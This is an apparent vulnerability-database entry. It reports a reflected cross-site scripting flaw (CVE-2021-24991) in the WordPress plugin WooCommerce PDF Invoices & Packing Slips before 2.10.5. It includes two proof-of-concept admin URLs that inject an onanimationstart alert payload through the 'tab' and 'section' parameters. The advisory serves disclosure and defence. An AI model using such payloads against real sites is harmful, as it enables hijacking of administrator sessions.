Lucene search
Krzysztof ZającWPEX-ID:88E706DF-AE03-4665-94A3-DB226E1F31A9HistoryDec 06, 2021 - 12:00 a.m.
WooCommerce PDF Invoices & Packing Slips < 2.10.5 - Reflected Cross-Site Scripting
2021-12-0600:00:00
Krzysztof Zając
39
0.001 Low
EPSS
Percentile
30.5%
The plugin does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard
https://example.com/wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D
https://example.com/wp-admin/admin.php?page=wpo_wcpdf_options_page&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3DRelated
wpvulndb
wpvulndb
prion
prion
Cross site scripting
2022-01-03 13:15:00
cvelist
cvelist
openvas
openvas
cve
cve
CVE-2021-24991
2022-01-03 13:15:08
nuclei
nuclei
patchstack
patchstack
nvd
nvd
CVE-2021-24991
2022-01-03 13:15:08
wpexploit
wpexploit